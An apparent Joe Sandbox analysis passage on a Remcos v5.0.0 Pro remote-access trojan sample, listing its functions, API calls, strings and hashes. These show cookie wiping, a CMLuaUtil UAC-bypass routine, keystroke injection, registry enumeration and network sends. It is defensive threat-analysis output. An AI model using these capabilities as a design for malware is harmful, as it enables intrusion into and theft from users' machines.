Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
Part of subcall function 00448215: _abort.LIBCMT ref: 00448293

_memcmp.LIBVCRUNTIME ref: 00445423
_free.LIBCMT ref: 00445494
_free.LIBCMT ref: 004454AD
_free.LIBCMT ref: 004454DF
_free.LIBCMT ref: 004454E8
_free.LIBCMT ref: 004454F4

Strings

C, xrefs: 004452E1

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: _free$ErrorLast$_abort_memcmp
String ID: C
API String ID: 1679612858-1037565863
Opcode ID: 3b59ec677d4d175c50db296303e2411e5fb3dbfaa0361dba4d40d6cf04aba7d4
Instruction ID: 551747f29a431029642ca2aca46be5bbca0cbe6c77a4b2ed9ddfbf6361621c56
Opcode Fuzzy Hash: 3b59ec677d4d175c50db296303e2411e5fb3dbfaa0361dba4d40d6cf04aba7d4
Instruction Fuzzy Hash: B2B13975A016199BEB24DF18C884BAEB7B4FF08308F5045EEE949A7351E774AE90CF44

Function 0041490A Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 225COMMON

Download Yara Rule

Strings

tcp, xrefs: 00414A73
udp, xrefs: 00414A46

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID:
String ID: tcp$udp
API String ID: 0-3725065008
Opcode ID: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
Instruction ID: c6aeaafd44a905d145cb4251883953767b251f71b123717361be5a5837da4da2
Opcode Fuzzy Hash: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
Instruction Fuzzy Hash: 637177B06083028FDB24CF65C480BABB7E4AFD4395F15442FF88986351E778DD858B9A

Function 00411CFE Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 206memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0041179C: SetLastError.KERNEL32(0000000D,00411D1C,00000000,t^F,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 004117A2

SetLastError.KERNEL32(000000C1,00000000,t^F,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 00411D37
GetNativeSystemInfo.KERNEL32(?,?,00000000,t^F,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 00411DA5
SetLastError.KERNEL32(0000000E), ref: 00411DC9

Part of subcall function 00411CA3: VirtualAlloc.KERNEL32(00000000,00000000,00000000,00000000,00411DE7,?,00000000,00003000,00000040,00000000), ref: 00411CB3

GetProcessHeap.KERNEL32(00000008,00000040), ref: 00411E10
HeapAlloc.KERNEL32(00000000), ref: 00411E17
SetLastError.KERNEL32(0000045A), ref: 00411F2A

Part of subcall function 00412077: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F37), ref: 004120E7
Part of subcall function 00412077: HeapFree.KERNEL32(00000000), ref: 004120EE

Strings

t^F, xrefs: 00411D02

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
String ID: t^F
API String ID: 3950776272-389975521
Opcode ID: 461a53a6892bac39e8501077da2db8edf6161aa159888280e3eaf045f7e1ced3
Instruction ID: a5564978de1508fcfe39aaa31f5973b4ee53e0220ffe5d2cf9b9f7f7cc9a58c7
Opcode Fuzzy Hash: 461a53a6892bac39e8501077da2db8edf6161aa159888280e3eaf045f7e1ced3
Instruction Fuzzy Hash: B661E370601201ABC7109F66C980BAB7BA5BF44744F04411BFA058B7A2E7BCE8D2CBD9

Function 0040186A Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 142threadCOMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 004018BE
ExitThread.KERNEL32 ref: 004018F6
waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00474EE0,00000000), ref: 00401A04

Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776

Strings

NG, xrefs: 00401990
PkG, xrefs: 00401888
NG, xrefs: 0040190D
XMG, xrefs: 00401902

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
String ID: PkG$XMG$NG$NG
API String ID: 1649129571-3151166067
Opcode ID: f03e1696385eff321045f3fd04ccd2f00e10c82d765726f3dffbcfbdf912789a
Instruction ID: 5b8630810f78da979eb204bf693be1d55f2004797ab3201abec5cd50ea38d472
Opcode Fuzzy Hash: f03e1696385eff321045f3fd04ccd2f00e10c82d765726f3dffbcfbdf912789a
Instruction Fuzzy Hash: BF41B4312042109BC324FB26DD96ABE73A6AB85314F00453FF54AA61F2DF386D49C75E

Function 00407963 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,00474EE0,00465FA4,?,00000000,00407FFC,00000000), ref: 004079C5
WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,00407FFC,00000000,?,?,0000000A,00000000), ref: 00407A0D

Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36

CloseHandle.KERNEL32(00000000,?,00000000,00407FFC,00000000,?,?,0000000A,00000000), ref: 00407A4D
MoveFileW.KERNEL32(00000000,00000000), ref: 00407A6A
CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407A95
DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AA5

Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(?,000000FF,?,00474EF8,00404C49,00000000,?,?,?,00474EF8,?), ref: 00404BA5
Part of subcall function 00404B96: SetEvent.KERNEL32(?), ref: 00404BC3

Strings

.part, xrefs: 00407989

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
String ID: .part
API String ID: 1303771098-3499674018
Opcode ID: 3af979d2a86f55abb037a5ea190009b8bddef8696a723389280064d929b35107
Instruction ID: 3872d967715c28256f57216ae0d43a20e9ded80e7ed52efebe816600842ab993
Opcode Fuzzy Hash: 3af979d2a86f55abb037a5ea190009b8bddef8696a723389280064d929b35107
Instruction Fuzzy Hash: 7F318371508341AFC210EB21DC4599FB7A8FF94359F00493EB545A2192EB78EE48CB9A

Function 00419993 Relevance: 12.1, APIs: 8, Instructions: 102keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 004199CC
SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004199ED
SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A0D
SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A21
SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A37
SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00419A54
SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00419A6F
SendInput.USER32(00000001,?,0000001C,?,00000000), ref: 00419A8B

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: InputSend
String ID:
API String ID: 3431551938-0
Opcode ID: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
Instruction ID: babcb3f23bbfeda7ed9031f98f3524dfd9ae94bb4b0c65128b251ed995bccade
Opcode Fuzzy Hash: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
Instruction Fuzzy Hash: CE31B471558349AEE310CF51DC41BEBBBDCEF98B54F00080FF6808A181D2A6A9C88B97

Function 00447571 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 389COMMONLIBRARYCODE

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00447679
__freea.LIBCMT ref: 00447723
__freea.LIBCMT ref: 00447741

Part of subcall function 00435E40: _free.LIBCMT ref: 00435E56

Strings

zD, xrefs: 004479AB
am/pm, xrefs: 004477A4
a/p, xrefs: 00447808

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: __freea$__alloca_probe_16_free
String ID: a/p$am/pm$zD
API String ID: 2936374016-2723203690
Opcode ID: ad0e661e8ca139f4988ec10911a06b569de76af7a8f23a444d27c6a0fba4a5cb
Instruction ID: 9fbfa546a4d6e8c17a1525f8bb1fcc11d6b56032d3bbc67104e2604220ae0e85
Opcode Fuzzy Hash: ad0e661e8ca139f4988ec10911a06b569de76af7a8f23a444d27c6a0fba4a5cb
Instruction Fuzzy Hash: 6AD1D1B1918206CAFB249F68C845ABBB7B1FF05310F28415BE545AB351D33D9D43CBA9

Function 00413A55 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 179registryCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413AEB
RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 00413B8B

Strings

[regsplt], xrefs: 00413C17
xUG, xrefs: 00413C46
TG, xrefs: 00413BFD

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: Enum$InfoQueryValue
String ID: [regsplt]$xUG$TG
API String ID: 3554306468-1165877943
Opcode ID: e28986e9332aa07a6eea5a33b9e26ecc66a365c7f4eba0dbebaa861638ff76d3
Instruction ID: b9c9d149d6e4de0395087b00820169330fa190b61d8fc59f93bff107e3475f49
Opcode Fuzzy Hash: e28986e9332aa07a6eea5a33b9e26ecc66a365c7f4eba0dbebaa861638ff76d3
Instruction Fuzzy Hash: E5511D72900219AADB11EB95DC85EEFB77DAF04305F10007AF505F6191EF786B48CBA9

Function 00456C1A Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00456D49

Strings

D[E, xrefs: 00456D10
D[E, xrefs: 00456C6D, 00456D5E

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: _free
String ID: D[E$D[E
API String ID: 269201875-3695742444
Opcode ID: a6e07d2e332d0ea6e1aa7b7f7b4c4c7b9128dbb8fddfed026ac15973f0d55745
Instruction ID: e1ec1e089ae9cf4c30c2343e7c59e1c9a5dba52e91c7d03f0b1416238821c5a9
Opcode Fuzzy Hash: a6e07d2e332d0ea6e1aa7b7f7b4c4c7b9128dbb8fddfed026ac15973f0d55745
Instruction Fuzzy Hash: 7A415B31A001046BEB216BBA8C4566F3BB4EF41336F96061BFC24D7293DA7C880D566D

Function 00413D0D Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 135registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00413D46

Part of subcall function 00413A55: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
Part of subcall function 00413A55: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413AEB

Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36

RegCloseKey.ADVAPI32(00000000,004660A4,004660A4,00466468,00466468,00000071), ref: 00413EB4

Strings

NG, xrefs: 00413D69
xUG, xrefs: 00413EA6
NG, xrefs: 00413E23
TG, xrefs: 00413E9A

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: CloseEnumInfoOpenQuerysend
String ID: xUG$NG$NG$TG
API String ID: 3114080316-2811732169
Opcode ID: f2e89265f4d2f0cfb10cd8f2c72011435137814bee02f1038c413f2e8c362d66
Instruction ID: 865164b8d80166fcad8b4517e5ed4c9fbafb7c73de3830c3e78154838722fbed
Opcode Fuzzy Hash: f2e89265f4d2f0cfb10cd8f2c72011435137814bee02f1038c413f2e8c362d66
Instruction Fuzzy Hash: 0B419E316082405BC324F726DC56AEF72959FD1348F40883FF54A671D2EF7C5949866E

Function 0045112C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,000000FF,?,00000000,00000000,0043F8C8,?,00000000,?,00000001,?,000000FF,00000001,0043F8C8,?), ref: 00451179
__alloca_probe_16.LIBCMT ref: 004511B1
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00451202
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00451214
__freea.LIBCMT ref: 0045121D

Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169

Strings

PkGNG, xrefs: 0045112E

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
String ID: PkGNG
API String ID: 313313983-263838557
Opcode ID: bce85a8c1b82420839f42ccd06a1f385e5b5f24b7ce490b3fee2b1b7615d4ae7
Instruction ID: 2862a929c21554b3885a63a70f5d1b49ed21d23a3953ed9914841bfcf42aa681
Opcode Fuzzy Hash: bce85a8c1b82420839f42ccd06a1f385e5b5f24b7ce490b3fee2b1b7615d4ae7
Instruction Fuzzy Hash: 6631D271A0020AABDF24DFA5DC41EAF7BA5EB04315F0445AAFC04D72A2E739CD55CB94

Function 0041B68A Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 91COMMON

Download Yara Rule

APIs

Part of subcall function 0041361B: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?,004750E4), ref: 0041363D
Part of subcall function 0041361B: RegQueryValueExW.ADVAPI32(?,0040F313,00000000,00000000,?,00000400), ref: 0041365C
Part of subcall function 0041361B: RegCloseKey.ADVAPI32(?), ref: 00413665

Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8

_wcslen.LIBCMT ref: 0041B763

Strings

program files\, xrefs: 0041B749, 0041B750, 0041B762
.exe, xrefs: 0041B6B5
8SG, xrefs: 0041B709, 0041B70E
http\shell\open\command, xrefs: 0041B69A
program files (x86)\, xrefs: 0041B75D

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: CloseCurrentOpenProcessQueryValue_wcslen
String ID: .exe$8SG$http\shell\open\command$program files (x86)\$program files\
API String ID: 37874593-122982132
Opcode ID: 2f5c0ff3d6ea7972f87a7f3e3c7ffac37502a487daadfbe7cd55c680b7f4a926
Instruction ID: 0af867b59be632d30c611c6dccf556baefac66a2e67262e696d3f692bc65d575
Opcode Fuzzy Hash: 2f5c0ff3d6ea7972f87a7f3e3c7ffac37502a487daadfbe7cd55c680b7f4a926
Instruction Fuzzy Hash: 6721A472A002086BDB14BAB58CD6AFE766D9B85328F14043FF405B72C2EE7C9D494269

Function 0040BEE9 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 87COMMON

Download Yara Rule

APIs

Part of subcall function 004135A6: RegOpenKeyExA.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 004135CA
Part of subcall function 004135A6: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400), ref: 004135E7
Part of subcall function 004135A6: RegCloseKey.ADVAPI32(?), ref: 004135F2

ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BF6B
PathFileExistsA.SHLWAPI(?), ref: 0040BF78

Strings

[IE cookies not found], xrefs: 0040BF40
Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders, xrefs: 0040BF02
Cookies, xrefs: 0040BEFD
[IE cookies cleared!], xrefs: 0040BFC5, 0040BFEA

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
API String ID: 1133728706-4073444585
Opcode ID: 246bfe7413cfec2d8385f2843d619168fbbecd56299b2e52a4c2fcf38f83732e
Instruction ID: 11f9a5ab4d81baf10890d677fe2d2a0774849eb970c5828eb217b404dd8a17fe
Opcode Fuzzy Hash: 246bfe7413cfec2d8385f2843d619168fbbecd56299b2e52a4c2fcf38f83732e
Instruction Fuzzy Hash: 38215271A4021AA6CB04F7B2CC569EE77699F10704F40017FE506B71D2EF7899498ADE

Function 00456B53 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 273ab8544d097714f5f9861dee4502037fec93a611cdb24e761043779f074d75
Instruction ID: 6cb1fb7365923ae9cd4386fa22a0d7cc2d4bdc50975796c61f51bb0de8f74700
Opcode Fuzzy Hash: 273ab8544d097714f5f9861dee4502037fec93a611cdb24e761043779f074d75
Instruction Fuzzy Hash: B9110272504214BAEB216F728C0496F3AACEF85326B52422BFD11C7252DE38CC41CAA8

Function 00450EFA Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00450C41: _free.LIBCMT ref: 00450C6A

_free.LIBCMT ref: 00450F48

Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA

_free.LIBCMT ref: 00450F53
_free.LIBCMT ref: 00450F5E
_free.LIBCMT ref: 00450FB2
_free.LIBCMT ref: 00450FBD
_free.LIBCMT ref: 00450FC8
_free.LIBCMT ref: 00450FD3

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
Instruction ID: d9348172fd0740f80504453a64c2ebf0df3e8af845a5f6206b1ac0666941ab15
Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
Instruction Fuzzy Hash: B411A231540B04AAD625BB72CC47FCB779CAF0230BF44491EBEED66053D6ACB9085745

Function 00411163 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00411170
int.LIBCPMT ref: 00411183

Part of subcall function 0040E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0D2
Part of subcall function 0040E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E0EC

std::_Facet_Register.LIBCPMT ref: 004111C3
std::_Lockit::~_Lockit.LIBCPMT ref: 004111CC
__CxxThrowException@8.LIBVCRUNTIME ref: 004111EA

Strings

(mG, xrefs: 0041117B

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
String ID: (mG
API String ID: 2536120697-4059303827
Opcode ID: 34a51a48ebffab58c1c893f3ae79879d0a70666fb45cbfefdea1ee74b3510b9f
Instruction ID: 9d9da6683174d9a5c92fa95d325e3547e0845688fcbb555b93a4fb26f280994d
Opcode Fuzzy Hash: 34a51a48ebffab58c1c893f3ae79879d0a70666fb45cbfefdea1ee74b3510b9f
Instruction Fuzzy Hash: 1411EB32900518A7CB14BB9AD8058DEBB79DF44354F10456FBE04A72D1DB789D40C7D9

Function 0041B2C3 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 61COMMON

Download Yara Rule

APIs

Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8

Part of subcall function 004135A6: RegOpenKeyExA.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 004135CA
Part of subcall function 004135A6: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400), ref: 004135E7
Part of subcall function 004135A6: RegCloseKey.ADVAPI32(?), ref: 004135F2

StrToIntA.SHLWAPI(00000000,0046C9F8,00000000,00000000,00000000,004750E4,00000003,Exe,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0041B33C

Strings

ProductName, xrefs: 0041B2D2
(64 bit), xrefs: 0041B368
SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 0041B2D7, 0041B2E1, 0041B322
CurrentBuildNumber, xrefs: 0041B31D
(32 bit), xrefs: 0041B36F

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: CloseCurrentOpenProcessQueryValue
String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
API String ID: 1866151309-2070987746
Opcode ID: 739a84b6b521fba7f3deec685196c40b2f0f20dc19e43594882229fa67cbe478
Instruction ID: 0537cd1ef0e49ffa1b211e53375311a7de90e31f2ded896f28e78de68f6ce99c
Opcode Fuzzy Hash: 739a84b6b521fba7f3deec685196c40b2f0f20dc19e43594882229fa67cbe478
Instruction Fuzzy Hash: 42112370A4010566C704B3668C87EFF77198B95314F94013BF856A21E2FB6C599683AE

Function 0043A35A Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,0043A351,004392BE), ref: 0043A368
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A376
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A38F
SetLastError.KERNEL32(00000000,?,0043A351,004392BE), ref: 0043A3E1

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: eac7a4b750c305e7b0904a447f782895729b7b2cae8ca2bab40c67d71c469531
Instruction ID: 5d53a0da36a7034647469206452edf011e0dcb0cee8899775f26e7a14c982385
Opcode Fuzzy Hash: eac7a4b750c305e7b0904a447f782895729b7b2cae8ca2bab40c67d71c469531
Instruction Fuzzy Hash: 7F01283214C3519EA61526796C86A6B2648EB0A7B9F30133FF918815F1EF594C90514D

Function 004075B0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 59COMMON

Download Yara Rule

APIs

CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe), ref: 004075D0

Part of subcall function 004074FD: _wcslen.LIBCMT ref: 00407521
Part of subcall function 004074FD: CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582

CoUninitialize.OLE32 ref: 00407629

Strings

[+] before ShellExec, xrefs: 004075F1
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe, xrefs: 004075B0, 004075B3, 00407605
[+] ShellExec success, xrefs: 0040760E
[+] ucmCMLuaUtilShellExecMethod, xrefs: 004075B5

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: InitializeObjectUninitialize_wcslen
String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
API String ID: 3851391207-382992119
Opcode ID: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
Instruction ID: 681a2da4e9d4b9e6b45db6330fec0c9e961fb52a18ca78f8243115a9baea1a6b
Opcode Fuzzy Hash: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
Instruction Fuzzy Hash: B201D272B087016BE2245B25DC0EF6B7758DB81729F11083FF902A61C2EBA9BC0145AB

Function 0040BAA1 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BADD
GetLastError.KERNEL32 ref: 0040BAE7

Strings

[Chrome Cookies found, cleared!], xrefs: 0040BB0D
\AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAA8
[Chrome Cookies not found], xrefs: 0040BB01
UserProfile, xrefs: 0040BAAD

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: DeleteErrorFileLast
String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
API String ID: 2018770650-304995407
Opcode ID: 3ac18cd69eb512cfe3046ffff68c330a49271f1a171cc2acfba67e1dc9669370
Instruction ID: 6bc0ec4de36c0471385c24d45a27137009bd471b3f80e31671ebbef4da92dce6
Opcode Fuzzy Hash: 3ac18cd69eb512cfe3046ffff68c330a49271f1a171cc2acfba67e1dc9669370
Instruction Fuzzy Hash: 08018F31A402095ACA04BBBACD5B8BE7724E912714F50017BF802726E6FE7D5A059ADE

Function 0041CD9B Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

AllocConsole.KERNEL32(00475338), ref: 0041CDA4
ShowWindow.USER32(00000000,00000000), ref: 0041CDBD
SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CDE2

Strings

Remcos v, xrefs: 0041CDFD
5.0.0 Pro, xrefs: 0041CE0B
CONOUT$, xrefs: 0041CDD0

Memory Dump Source

